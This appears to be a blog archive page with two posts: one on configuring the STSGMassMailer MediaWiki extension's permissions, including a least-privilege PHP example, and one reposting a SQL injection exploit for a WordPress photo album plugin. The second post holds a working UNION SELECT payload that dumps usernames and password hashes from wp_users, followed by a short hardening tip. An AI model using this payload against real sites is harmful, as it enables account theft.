Archive

Posts Tagged ‘Permissions’

STSGMassMailer Helps MediaWiki Send Mass E-mail

May 23rd, 2008

STSGMassMailer is an extension for MediaWiki; many thanks to “漢武帝” for introducing me to it.

Detailed documentation for this extension: http://www.mediawiki.org/wiki/Extension:STSGMassMailer

STGS MassMailer adds a special page called Mass E-mail which allows to send a mass emailing to all wiki users with valid email addresses. It also allows you to pick and choose which persons to send to, and you can even add extra email address that are not in your database. Since there is definite possibility of abuse, this special page is only available to users who have the delete access on the wiki (i.e. sysops or any other user defined group with privileges to do so).

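STSGMassMailer adds a page called Mass E-mail to the special pages, through which mass e-mail can be sent to all wiki users whose e-mail address has been confirmed. It can also send selectively to chosen wiki users, and even lets you add e-mail addresses that are not in the database. To keep mass mailing from being abused, this special page is by default available only to users who have the delete permission (the sysops (system administrators) group, or users in a privileges (operators) group).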

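To lower the mass-mail permission from the highly restricted level to the level of ordinary registered users, you only need to change this code in extensions/SpecialMassEmail.body.php: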

if($wgUser->isAllowed("delete")) {
to the following (this check appears in two places):
if($wgUser->isAllowed("edit")) {
Then add $wgGroupPermissions['*']['edit'] = false; to LocalSettings.php to prevent anonymous users from using mass mailing.

The restriction on who may use mass mailing then hinges on whether the user has the edit permission.
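
A narrower alternative to reusing the edit right, shown as an added example that is not from the original post or from the extension: a dedicated right for the mass mailer, so the wiki's edit policy and the mailer's access are controlled separately. The right name massemail and the group name massmailer are assumed names; $wgAvailableRights and $wgGroupPermissions are standard MediaWiki settings.

```php
<?php
// Added example for LocalSettings.php. The right name 'massemail' and the
// group name 'massmailer' are assumed names, not part of STSGMassMailer.

// Variant from the post: the mailer checks the 'edit' right, so every account
// that can edit can also mail every user, and anonymous editing has to be
// disabled wiki-wide only to keep anonymous visitors off the mailer:
// $wgGroupPermissions['*']['edit'] = false;

// Least-privilege variant: register a dedicated right and grant it explicitly.
// A right that none of a user's groups grants is not held by that user, so
// '*' and 'user' need no entry here.
$wgAvailableRights[] = 'massemail';
$wgGroupPermissions['sysop']['massemail'] = true;
// New group; members are added through Special:UserRights.
$wgGroupPermissions['massmailer']['massemail'] = true;

// Matching check in extensions/SpecialMassEmail.body.php (both places):
// if($wgUser->isAllowed("massemail")) {
```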

For installation instructions, see the MediaWiki page.


Wordpress Photo album Remote SQL Injection Vulnerability

February 18th, 2008

EXAMPLE
http://xxxxxxxx/?page_id=13&album= [exploit]
EXPLOIT
S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201
# WordPress album PHOTO SQL Injection
# AUTHOR : S@BUN
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
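Recommendation: change the privileges of the admin user and create a separate administrator account that is not used for publishing posts, or go straight into the database and rename admin to something else.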
